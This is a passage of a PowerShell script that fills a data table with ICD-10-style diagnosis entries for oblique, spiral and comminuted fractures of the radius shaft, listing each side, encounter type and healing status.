shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of left radius","Displaced oblique fracture of shaft of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced oblique fracture of shaft of unspecified radius","Displaced oblique fracture of shaft of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of right radius","Nondisplaced oblique fracture of shaft of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of left radius","Nondisplaced oblique fracture of shaft of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced oblique fracture of shaft of unspecified radius","Nondisplaced oblique fracture of shaft of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, right arm","Displaced spiral fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, left arm","Displaced spiral fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced spiral fracture of shaft of radius, unspecified arm","Displaced spiral fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, right arm","Nondisplaced spiral fracture of shaft of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, left arm","Nondisplaced spiral fracture of shaft of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of radius, unspecified arm","Nondisplaced spiral fracture of shaft of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of radius, right arm","Displaced comminuted fracture of shaft of radius, right arm, subsequent encounter for open 